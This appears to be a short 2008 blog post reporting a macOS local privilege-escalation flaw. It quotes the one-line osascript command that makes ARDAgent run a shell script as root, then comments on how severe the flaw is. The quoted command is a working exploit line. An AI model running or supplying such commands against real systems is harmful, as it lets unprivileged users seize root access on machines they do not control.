Apple gets Pwned
Wednesday, June 18th, 2008$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"' root
Wow. A one line script that allows any logged in user to grab root, not even a buffer overflow or third party software involved. This is movie plot hacking at its finest. I haven’t seen an attack this bad in years.
The only thing I would imagine that could be worse would be if you could execute this attack remotely.